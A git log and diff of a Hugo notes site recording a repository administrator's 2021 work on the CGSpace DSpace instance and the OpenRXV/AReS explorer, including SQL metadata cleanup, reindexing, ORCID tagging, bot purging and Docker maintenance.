8fa41f92c8 Add notes for 2021-12-06 2021-12-06 16:40:50 +02:00
803d91481e Add notes for 2021-12 2021-12-05 17:55:47 +02:00
80c9765cc7 Add notes for 2021-12-02 2021-12-03 12:58:43 +02:00
0f2e08b43b Add notes 2021-11-30 16:44:30 +02:00
61a012edee Add notes for 2021-11-27 2021-11-27 14:37:33 +02:00
103b6548fa Add notes for 2021-11-26 2021-11-27 12:18:52 +02:00
55c22a0d10 Add notes for 2021-11-22 2021-11-22 16:47:50 +02:00
9f73f9bcb5 Add notes for 2021-11-21 and regenerate public 2021-11-21 13:45:30 +02:00
9afe5c13f9 Add notes for 2021-11-08 2021-11-09 06:29:52 +02:00
b3df4ff58f Add notes for 2021-11-07 2021-11-07 11:26:32 +02:00
2ca9096495 Add notes for 2021-11-02 2021-11-03 15:56:15 +02:00
b04ec94cbe Add 2021-11 and regenerate docs 2021-11-01 10:49:21 +02:00
be72befbe2 content/posts/2021-10.md: Fix toml syntax issue 2021-11-01 10:48:13 +02:00
dbff911e21 Add notes for 2021-10-31 2021-11-01 10:07:51 +02:00
5bec10a872 Regenerate docs 2021-11-01 10:07:11 +02:00
702efab048 Add notes for 2021-10-28 2021-10-28 18:08:13 +03:00
784984f4c0 Add notes for 2021-10-24 2021-10-24 21:21:01 +03:00
aa4835e32b Add notes for 2021-10-20 2021-10-20 22:21:55 +03:00
37e7b22fd3 Add notes for 2021-10-17 2021-10-17 20:47:01 +03:00
49d409f412 Add notes for 2021-10-11 2021-10-11 20:06:42 +03:00
4ad6f7e3a6 Add notes for 2021-10-10 2021-10-10 16:01:27 +03:00
ab8cb272ea Add notes for 2021-10-09 2021-10-09 22:00:59 +03:00
23d6a808fc Add notes for 2021-10-08 2021-10-08 17:15:17 +03:00
b55e6c9efe Add notes for 2021-10-06 2021-10-07 08:27:39 +03:00
63500a8837 Add notes for 2021-10-05 2021-10-05 18:54:39 +03:00
4c11bc1c1e Add notes for 2021-10 2021-10-04 19:40:13 +03:00
45ae9e7820 content/posts/2021-09.md: Fix syntax error 2021-10-04 11:10:54 +03:00
50407a4570 Add notes for 2021-09-29 2021-09-29 22:42:43 +03:00
a8adcff9e2 Add notes for 2021-09-28 2021-09-28 22:00:36 +03:00
a6add992ce Regenerate docs 2021-09-28 10:32:32 +03:00
f1d7a1186a Update theme submodule 2021-09-28 10:32:13 +03:00
7a891bd8ad Add notes for 2021-09-27 2021-09-27 17:15:57 +03:00
1bbd6355e5 Add notes for 2021-09-26 2021-09-26 22:16:39 +03:00
bbf478c410 Add notes for 2021-09-24 2021-09-24 14:24:00 +03:00
992c58601f Update notes for 2021-09-23 2021-09-23 18:32:47 +03:00
6fb37006b4 Add notes for 2021-09-23 2021-09-23 18:19:11 +03:00
f16d6c79a7 Regenerate public 2021-09-21 12:47:05 +03:00
43722deb40 cgspace-cgcorev2-migration.md: Add out of scope header 2021-09-21 12:46:34 +03:00
aad88f8084 Add notes for 2021-09-20 2021-09-20 17:31:45 +03:00
4b2b8c1034 content/posts/2020-01.md: Fix typo 2021-09-20 15:47:34 +03:00
313bed0608 Add notes for 2021-09-19 2021-09-19 15:42:23 +03:00
61e8011d7f Add notes for 2021-09-17 2021-09-17 15:03:28 +03:00
e067978bc0 Add notes for 2021-09-16 2021-09-16 16:35:00 +03:00
de66de9544 Add notes for 2021-09-16 2021-09-16 06:49:05 +03:00
c05c7213c2 Add notes for 2021-09-13 2021-09-13 16:21:16 +03:00
8b487a4a77 Add notes for 2021-09-05 2021-09-06 12:31:11 +03:00
71362684ea Add notes for 2021-09-02 2021-09-04 21:16:03 +03:00
2441d8ffd5 Add notes for 2021-09-02 2021-09-02 17:21:48 +03:00
8dc7ea732c content/posts/2021-08.md: Fix syntax error in vim modeline 2021-09-02 17:06:28 +03:00
fae039cf46 content/posts/2021-08.md: Syntax fix 2021-09-02 16:37:56 +03:00
c617679b73 Add notes for 2021-08-31 2021-09-01 09:12:28 +03:00
146c5b02ff Add notes for 2021-08-29 2021-08-29 21:07:25 +03:00
d5c9cc6059 Add notes for 2021-08-25 2021-08-25 15:13:43 +03:00
63d040ffef Update notes for 2021-08-19 2021-08-19 22:32:35 +03:00
65a2a89597 Add notes for 2021-08-18 2021-08-18 16:24:40 +03:00
38bbb29492 content/posts/2019-04.md: Fix typo 2021-08-18 15:29:31 +03:00
d71242aaec Add notes for 2021-08-17 2021-08-18 09:17:20 +03:00
14875c060f Add notes for 2021-08-17 2021-08-17 10:59:14 +03:00
aa7a0a8218 Add notes for 2021-08-16 2021-08-16 21:35:44 +03:00
38e9b3a7df Update notes for 2021-08-12 2021-08-12 21:12:25 +03:00
e35c79f0da Update notes for 2021-08-12 2021-08-12 16:36:55 +03:00
bf939afa24 Add notes for 2021-08-12 2021-08-12 12:42:59 +03:00
dba953ae9b Add notes for 2021-08-11 2021-08-11 16:19:26 +03:00
306 changed files with 51749 additions and 12959 deletions


@@ -777,7 +777,7 @@ Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
- Peter noticed that some goo.gl links in our tweets from Feedburner are broken, for example this one from last week:
{{< tweet 1086330519904673793 >}}
{{< tweet user="ILRI" id="1086330519904673793" >}}
- The shortened link is [goo.gl/fb/VRj9Gq](goo.gl/fb/VRj9Gq) and it shows a "Dynamic Link not found" error from Firebase:


@@ -623,7 +623,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
## 2019-04-14
- Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.14.4 startup script:
- Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:
```
GC_TUNE="-XX:NewRatio=3 \


@@ -209,7 +209,7 @@ dc.identifier.issn
- I need to follow up with Moayad about the reporting functionality
- Also, I need to email Harrison my notes on the CG Core v2 stuff
- Also, Jane asked me to check the Data Portal to see which email address requests for confidential data are going
- Yesterday Theirry from CTA asked me about an error he was getting while submitting an item on CGSpace: "Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission."
- Yesterday Thierry from CTA asked me about an error he was getting while submitting an item on CGSpace: "Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission."
- I looked in the DSpace logs and found this right around the time of the screenshot he sent me:
```


@@ -10,7 +10,7 @@ categories: ["Notes"]
- Open [a ticket](https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706) with Atmire to request a quote for the upgrade to DSpace 6
- Last week Altmetric responded about the [item](https://hdl.handle.net/10568/97087) that had a lower score than its DOI
- The score is now linked to the DOI
- Another [item](https://handle.hdl.net/10568/91278) that had the same problem in 2019 has now also linked to the score for its DOI
- Another [item](https://hdl.handle.net/10568/91278) that had the same problem in 2019 has now also linked to the score for its DOI
- Another [item](https://hdl.handle.net/10568/81236) that had the same problem in 2019 has also been fixed
## 2020-01-07


@@ -21,7 +21,7 @@ categories: ["Notes"]
$ schedtool -D -e ionice -c2 -n7 nice -n19 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
```
- And it seems that we need to enabled `pg_crypto` now (used for UUIDs):
- And it seems that we need to enable `pgcrypto` now (used for UUIDs):
```
$ psql -h localhost -U postgres dspace63


@@ -210,6 +210,7 @@ if(cells['sherpa romeo journal title'].value == cells['crossref journal title'].
- It is faster and uses less memory than GraphicsMagick (and ImageMagick), and produces nice thumbnails from PDFs
- One drawback is that libvips uses Poppler instead of GraphicsMagick, which apparently means that it can't work in CMYK
- I tested one item (10568/51999) that uses CMYK and the thumbnail looked OK (closer to the original than GraphicsMagick), so I'm not sure...
- Perhaps this is not a problem after all, see this PR from 2019: https://github.com/libvips/libvips/pull/1196
- I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:
```console
@@ -225,5 +226,210 @@ $ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409
- The ImageMagick way is the same as how DSpace does it (first creating an intermediary image, then getting a thumbnail)
- libvips does use less time and memory... I should do more tests!
- I wonder if I can try to use these [unofficial Java bindings](https://github.com/criteo/JVips/blob/master/src/test/java/com/criteo/vips/example/SimpleExample.java) in DSpace
- The authors of the JVips project wrote a nice blog post about libvips performance: https://medium.com/criteo-engineering/boosting-image-processing-performance-from-imagemagick-to-libvips-268cc3451d55
- Ouch, JVips is Java 8 only as far as I can tell... that works now, but it's a non-starter going forward
## 2021-08-11
- Peter got back to me about the journal title cleanup
- From his corrections it seems an overwhelming majority of his choices match the Sherpa Romeo version of the titles rather than Crossref's
- Anyways, I exported the originals that were the same in Sherpa Romeo and Crossref, as well as Peter's selections for the cases where Sherpa Romeo and Crossref differed:
```console
$ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d > /tmp/journals1.txt
$ csvcut -c 'sherpa romeo journal title' ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d > /tmp/journals2.txt
$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
1911
```
- Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine
- I exported a list of all the journal titles we have in the `cg.journal` field:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT(text_value) AS "cg.journal" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
COPY 3245
```
- I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don't match, so I'd have to go check many of them manually before selecting a match or fixing them...
- I think it's better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way
- Or instead of doing it via SQL I could use CSV and parse the values there...
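- As a rough sketch of that idea (this uses the public Crossref journals API; the real script would loop over our CSV), a journal title can be looked up by ISSN like so:
```console
$ curl -s 'https://api.crossref.org/journals/0003-1305' | python3 -c 'import json,sys; print(json.load(sys.stdin)["message"]["title"])'
The American Statistician
```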
- A few more issues:
- Some ISSNs are non-existent in Sherpa Romeo and Crossref, but appear on issn.org's web search (their API is invite only)
- Some titles are different across all three datasets, for example ISSN 0003-1305:
- [According to ISSN.org](https://portal.issn.org/resource/ISSN/0003-1305) this is "The American statistician"
- [According to Sherpa Romeo](https://v2.sherpa.ac.uk/id/publication/20807) this is "American Statistician"
- [According to Crossref](https://search.crossref.org/?q=0003-1305&from_ui=yes&container-title=The+American+Statistician) this is "The American Statistician"
- I also realized that our previous controlled vocabulary came from CGSpace's top 500 journals, so when I replaced it with the generated list earlier today we lost some journals
- Now I went back and merged the previous with the new, and manually removed duplicates (sigh)
- I requested access to the issn.org OAI-PMH API so I can use their registry...
## 2021-08-12
- I sent an email to Sherpa Romeo's help contact to ask about missing ISSNs
- They pointed me to their [inclusion criteria](https://v2.sherpa.ac.uk/romeo/about.html) and said that missing journals should submit their open access policies to be included
- The contact from issn.org got back to me and said I should pay 1,000 EUR per year for 100,000 requests to their API... no thanks
- Submit a pull request to COUNTER-Robots for the httpx bot ([#45](https://github.com/atmire/COUNTER-Robots/pull/45))
- In the meantime I added it to our local ILRI overrides
## 2021-08-15
- Start a fresh reindex on AReS
## 2021-08-16
- Meeting with Abenet and Peter about CGSpace actions and future
- We agreed to move three top-level Feed the Future projects into one community, so I created one and moved them:
```console
$ dspace community-filiator --set --parent=10568/114644 --child=10568/72600
$ dspace community-filiator --set --parent=10568/114644 --child=10568/35730
$ dspace community-filiator --set --parent=10568/114644 --child=10568/76451
```
- I made a minor fix to OpenRXV to prefix all image names with `docker.io` so it works with fewer changes on podman
- Docker assumes the `docker.io` registry by default, but we should be explicit
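- For example (the image tag here is only an illustration), a fully qualified name behaves the same everywhere, while a short name forces podman to resolve the registry itself:
```console
$ podman pull docker.io/library/node:12-alpine   # explicit registry, unambiguous
$ podman pull node:12-alpine                     # podman must guess (or prompt for) the registry, depending on its configuration
```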
## 2021-08-17
- I made an initial attempt on the policy statements page on DSpace Test
- It is modeled on Sherpa Romeo's OpenDOAR policy statements advice
- Sit with Moayad and discuss the future of AReS
- We specifically discussed formalizing the API and documenting its use so it can serve as an alternative to harvesting directly from CGSpace
- We also discussed allowing linking to search results to enable something like "Explore this collection" links on CGSpace collection pages
- Lower case all AGROVOC metadata, as I had noticed a few in sentence case:
```console
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 484
```
- Also update some DOIs using the `dx.doi.org` format, just to keep things uniform:
```console
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE 469
```
- Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 322m16.917s
user 226m43.121s
sys 3m17.469s
```
- I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:
```console
$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search?scroll=1d' \
-H 'Content-Type: application/json' \
-d '{
"size": 10,
"query": {
"bool": {
"filter": {
"term": {
"repo.keyword": "CGSpace"
}
}
}
}
}'
$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ=='
```
- This uses the Elasticsearch scroll ID to page through results
- The second query doesn't need the request body because it is saved for 1 day as part of the first request
- Attempt to re-do my tests with VisualVM from 2019-04
- I found that I can't connect to the Tomcat JMX port using SSH forwarding (visualvm gives an error about localhost already being monitored)
- Instead, I had to create a SOCKS proxy with SSH (ssh -D 8096), then set that up as a proxy in the VisualVM network settings, and then add the JMX connection
- See: https://dzone.com/articles/visualvm-monitoring-remote-jvm
- I have to spend more time on this...
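- Roughly, the workflow was (the host name and JMX port here are examples):
```console
# open a SOCKS proxy on localhost:8096 to the remote server
$ ssh -D 8096 dspacetest.cgiar.org
# then set localhost:8096 as a SOCKS proxy in VisualVM's network settings
# and add a JMX connection to the remote Tomcat, for example dspacetest.cgiar.org:6969
```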
- I fixed a bug in the Altmetric donuts on OpenRXV
- We now [try to show the donut for the DOI first if it exists, then fall back to the Handle](https://github.com/ilri/OpenRXV/pull/113)
- This is working on my local test, but not on the live site... sigh
- I started a fresh harvest, maybe it's something to do with the metadata in Elasticsearch
- I improved the quality of the "no thumbnail" placeholder image on AReS: https://github.com/ilri/OpenRXV/pull/114
- I sent some feedback to some ILRI and CCAFS colleagues about how to use better thumbnails for publications
## 2021-08-24
- In the last few days I did a lot of work on OpenRXV
- I started exploring the Angular 9.0 to 9.1 update
- I tested some updates to dependencies for Angular 9 that we somehow missed, like @tinymce/tinymce-angular, @nicky-lenaers/ngx-scroll-to, and @ng-select/ng-select
- I changed the default target from ES5 to ES2015 because ES5 was released in 2009 and the only thing we lose by moving to ES2015 is IE11 support
- I fixed a handful of issues in the Docker build and deployment process
- I started exploring changing the Docker configuration from using volumes to `COPY` instructions in the `Dockerfile` because we are having sporadic issues with permissions in containers caused by copying the host's frontend/backend directories and not being able to write to them
- I tested moving from node-sass to sass, as it has been [supported since Angular 8 apparently](https://blog.ninja-squad.com/2019/05/29/angular-cli-8.0/) and will allow us to avoid stupid node-gyp issues
## 2021-08-25
- I did a bunch of tests of the OpenRXV Angular 9.1 update and merged it to master ([#115](https://github.com/ilri/OpenRXV/pull/115))
- Last week Maria Garruccio sent me a handful of new ORCID identifiers for Bioversity staff
- We currently have 1320 unique identifiers, so this adds eleven new ones:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-08-25-combined-orcids.txt
$ wc -l /tmp/2021-08-25-combined-orcids.txt
1331
```
- After I combined them and removed duplicates, I resolved all the names using my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
```
- Tag existing items from the Alliance's new authors with ORCID iDs using `add-orcid-identifiers-csv.py` (181 new metadata fields added):
```console
$ cat 2021-08-25-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Chege, Christine G. Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
"Chege, Christine Kiria","Christine G.Kiria Chege: 0000-0001-8360-0279"
"Kiria, C.","Christine G.Kiria Chege: 0000-0001-8360-0279"
"Kinyua, Ivy","Ivy Kinyua :0000-0002-1978-8833"
"Rahn, E.","Eric Rahn: 0000-0001-6280-7430"
"Rahn, Eric","Eric Rahn: 0000-0001-6280-7430"
"Jager M.","Matthias Jager: 0000-0003-1059-3949"
"Jager, M.","Matthias Jager: 0000-0003-1059-3949"
"Jager, Matthias","Matthias Jager: 0000-0003-1059-3949"
"Waswa, Boaz","Boaz Waswa: 0000-0002-0066-0215"
"Waswa, Boaz S.","Boaz Waswa: 0000-0002-0066-0215"
"Rivera, Tatiana","Tatiana Rivera: 0000-0003-4876-5873"
"Andrade, Robert","Robert Andrade: 0000-0002-5764-3854"
"Ceccarelli, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
"Ceccarellia, Viviana","Viviana Ceccarelli: 0000-0003-2160-9483"
"Nyawira, Sylvia","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
"Nyawira, Sylvia S.","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
"Nyawira, Sylvia Sarah","Sylvia Sarah Nyawira: 0000-0003-4913-1389"
"Groot, J.C.","Groot, J.C.J.: 0000-0001-6516-5170"
"Groot, J.C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
"Groot, Jeroen C.J.","Groot, J.C.J.: 0000-0001-6516-5170"
"Groot, Jeroen CJ","Groot, J.C.J.: 0000-0001-6516-5170"
"Abera, W.","Wuletawu Abera: 0000-0002-3657-5223"
"Abera, Wuletawu","Wuletawu Abera: 0000-0002-3657-5223"
"Kanyenga Lubobo, Antoine","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
"Lubobo Antoine, Kanyenga","Antoine Lubobo Kanyenga: 0000-0003-0806-9304"
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
## 2021-08-29
- Run a full harvest on AReS
- Also did more work on OpenRXV over the past few days
- I switched the backend target from ES2017 to ES2019
- I did a proof of concept with multi-stage builds and simplifying the Docker configuration
- Update the list of ORCID identifiers on CGSpace
- Run system updates and reboot CGSpace (linode18)
## 2021-08-31
- Yesterday I finished the work to make OpenRXV use a new multi-stage Docker build system and use smarter `COPY` instructions instead of runtime volumes
- Today I merged the changes to the master branch and re-deployed AReS on linode20
- Because the `docker-compose.yml` moved to the root the Docker volume prefix changed from `docker_` to `openrxv_` so I had to stop the containers and rsync the data from the old volume to the new one in /var/lib/docker
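- The data copy was roughly as follows (the volume name is a placeholder, not the real one):
```console
$ docker-compose down
# Docker's local volumes keep their data under /var/lib/docker/volumes/<name>/_data
$ sudo rsync -av /var/lib/docker/volumes/docker_esData/_data/ /var/lib/docker/volumes/openrxv_esData/_data/
$ docker-compose up -d
```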
<!-- vim: set sw=2 ts=2: -->

content/posts/2021-09.md (new file)

@@ -0,0 +1,395 @@
---
title: "September, 2021"
date: 2021-09-01T09:14:07+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-09-02
- Troubleshooting the missing Altmetric scores on AReS
- Turns out that I didn't actually fix them last month because the check for `content.altmetric` still exists, and I can't access the DOIs using `_h.source.DOI` for some reason
- I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
- I will change `DOI` to `tomato` in the repository setup and start a re-harvest... I need to see if this is some kind of reserved word or something...
- Even as `tomato` I can't access that field as `_h.source.tomato` in Angular, but it does work as a filter source... sigh
- I'm having problems using the OpenRXV API
- The syntax Moayad showed me last month doesn't seem to honor the search query properly...
<!--more-->
## 2021-09-05
- Update Docker images on AReS server (linode20) and rebuild OpenRXV:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
- Then run system updates and reboot the server
- After the system came back up I started a fresh re-harvesting
## 2021-09-07
- Checking last month's Solr statistics to see if there are any new bots that I need to purge and add to the list
- 78.203.225.68 made 50,000 requests on one day in August, and it is using this user agent: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36`
- It's a fixed line ISP in Montpellier according to AbuseIPDB.com, and has not been flagged as abusive, so it must be some CGIAR SMO person doing some web application harvesting from the browser
- 130.255.162.154 is in Sweden and made 46,000 requests in August and it is using this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0`
- 35.174.144.154 is on Amazon and made 28,000 requests with this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36`
- 192.121.135.6 is in Sweden and made 9,000 requests with this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0`
- 185.38.40.66 is in Germany and made 6,000 requests with this user agent: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 BoldBrains SC/1.10.2.4`
- 3.225.28.105 is on Amazon and made 3,000 requests with this user agent: `Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36`
- I also noticed that we still have tons (25,000) of requests by MSNbot using this normal-looking user agent: `Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko`
- I can identify them by their reverse DNS: msnbot-40-77-167-105.search.msn.com.
- I had already purged a bunch of these by their IPs in 2021-06, so it looks like I have to do that again
- While looking at the MSN requests I noticed tons of requests from another strange set of hosts, judging by their reverse DNS: malta2095.startdedicated.com., astra5139.startdedicated.com., and many others
- They must be related, because I see them all using the exact same user agent: `Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko`
- So this startdedicated.com DNS is some Bing bot also...
- I extracted all the IPs and purged them using my `check-spider-ip-hits.sh` script
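- The extraction itself was something along these lines (the log path and format are assumptions):
```console
# list unique IPs sending that user agent, then check their reverse DNS
$ grep 'Windows NT 6.3; Trident/7.0; rv:11.0' /var/log/nginx/access.log | awk '{print $1}' | sort -u > /tmp/bot-ips.txt
$ while read -r ip; do host "$ip"; done < /tmp/bot-ips.txt
# then feed /tmp/bot-ips.txt to check-spider-ip-hits.sh to purge their hits from Solr
```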
- In total I purged 225,000 hits...
## 2021-09-12
- Start a harvest on AReS
## 2021-09-13
- Mishell Portilla asked me about thumbnails on CGSpace being small
- For example, [10568/114576](https://cgspace.cgiar.org/handle/10568/114576) has a lot of white space on the left side
- I created a new thumbnail with vipsthumbnail:
```console
$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o '%s.jpg[Q=85,optimize_coding,strip]'
```
- Looking at the PDF's metadata I see:
- Producer: iLovePDF
- Creator: Adobe InDesign 15.0 (Windows)
- Format: PDF-1.7
- Eventually I should do more tests on this and perhaps file a bug with DSpace...
- Some Alliance people contacted me about getting access to the CGSpace API to deposit with their TIP tool
- I told them I can give them access to DSpace Test and that we should have a meeting soon
- We need to figure out what controlled vocabularies they should use
## 2021-09-14
- Some people from the Alliance contacted me last week about AICCRA metadata
- They have internal things called Components and Clusters, so they were asking how to store these in CGSpace
- I suggested adding new metadata values: `cg.subject.aiccraComponent` and `cg.subject.aiccraCluster`
- On second thought, these are identifiers so perhaps this is better: `cg.identifier.aiccraComponent` and `cg.identifier.aiccraCluster`
## 2021-09-15
- Add ORCID identifier for new ILRI staff to our controlled vocabulary
- Also tag their twenty-five existing items on CGSpace:
```console
$ cat 2021-09-15-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Kotchofa, Pacem","Pacem Kotchofa: 0000-0002-1640-8807"
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p 'fuuuu'
```
- Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API
- I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using
- I also told them that I would create some documentation listing the metadata fields, which are mandatory, and the respective controlled vocabularies
## 2021-09-16
- Start writing a Python script to parse `input-forms.xml` to create documentation for submissions
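- A minimal sketch of that idea (element names assumed from the stock DSpace 6 `input-forms.xml`) could start like this:
```console
$ python3 -c "
import xml.etree.ElementTree as ET
tree = ET.parse('dspace/config/input-forms.xml')
for field in tree.iter('field'):
    schema = field.findtext('dc-schema') or ''
    element = field.findtext('dc-element') or ''
    qualifier = field.findtext('dc-qualifier') or ''
    label = field.findtext('label') or ''
    print('.'.join(filter(None, [schema, element, qualifier])) + ': ' + label)
"
```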
- Found a bug with the DSpace 6.3 REST API, it returns HTTP 500 for `dc.title` even though it exists in the registry: https://demo.dspace.org/rest/registries/schema/dc/metadata-fields/title
- Seems to be with any field that does not have a qualifier
- I filed an issue: https://github.com/DSpace/DSpace/issues/7946
- I decided to update all the metadata field descriptions in our registry so I can use that instead of the "hint" for each field in the input form
- I will include examples as well so that it becomes a better resource
## 2021-09-17
- I filed [an issue about using SPDX License Identifiers in CG Core v2](https://github.com/AgriculturalSemantics/cg-core/issues/41)
- Peter Ballantyne emailed me to say that CGSpace was very slow
- The front page was returning a blank white page
- I looked at the database and the connections look low:
```console
$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
63
```
- Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin
- But the DSpace log file shows tons of database issues:
```console
$ grep -c "Timeout waiting for idle object" dspace.log.2021-09-17
14779
```
- The earliest one I see is around midnight (now is 2PM):
```console
2021-09-17 00:01:49,572 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
```
- But I was definitely logged into the site this morning so there were no issues then...
- It seems that a few errors are normal, but there's obviously something wrong today:
```console
$ grep -c "Timeout waiting for idle object" dspace.log.2021-09-*
dspace.log.2021-09-01:116
dspace.log.2021-09-02:163
dspace.log.2021-09-03:77
dspace.log.2021-09-04:13
dspace.log.2021-09-05:310
dspace.log.2021-09-06:0
dspace.log.2021-09-07:29
dspace.log.2021-09-08:86
dspace.log.2021-09-09:24
dspace.log.2021-09-10:26
dspace.log.2021-09-11:12
dspace.log.2021-09-12:5
dspace.log.2021-09-13:10
dspace.log.2021-09-14:102
dspace.log.2021-09-15:542
dspace.log.2021-09-16:368
dspace.log.2021-09-17:15235
```
- I restarted the server and DSpace came up fine... so it must have been some kind of fluke
- Continue working on cleaning up and annotating the metadata registry on CGSpace
- I removed two old metadata fields that we stopped using earlier this year with the CG Core v2 migration: `cg.targetaudience` and `cg.title.journal`
## 2021-09-18
- Make more progress on parsing and documenting the CGSpace submission form
- Publish on GitHub: https://github.com/ilri/cgspace-submission-guidelines
## 2021-09-19
- Improve CGSpace Submission Guidelines metadata parsing and documentation
- GitHub Pages is live now: https://ilri.github.io/cgspace-submission-guidelines/
- Start a full harvest on AReS
- The harvest completed successfully, but for some reason there were only 92,000 items...
- I updated all Docker images, rebuilt the application, then ran all system updates and rebooted the system:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
## 2021-09-20
- I synchronized the production CGSpace PostgreSQL, Solr, and assetstore data with DSpace Test
- Over the weekend a few users reported that they could not log into CGSpace
- I checked LDAP and it seems there is something wrong:
```console
$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-ldap-account@cgiarad.org" -W "(sAMAccountName=someaccountnametocheck)"
Enter LDAP Password:
ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)
```
- I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted
- It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decommissioned the old one last week
- I updated the configuration on CGSpace and confirmed that it is working
- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
```console
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
```
- I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
- Run `dspace cleanup -v` process on CGSpace to clean up old bitstreams
- Export lists of authors, donors, and affiliations for Peter Ballantyne to clean up:
```console
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-authors.csv WITH CSV HEADER;
COPY 80901
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-09-20-donors.csv WITH CSV HEADER;
COPY 1274
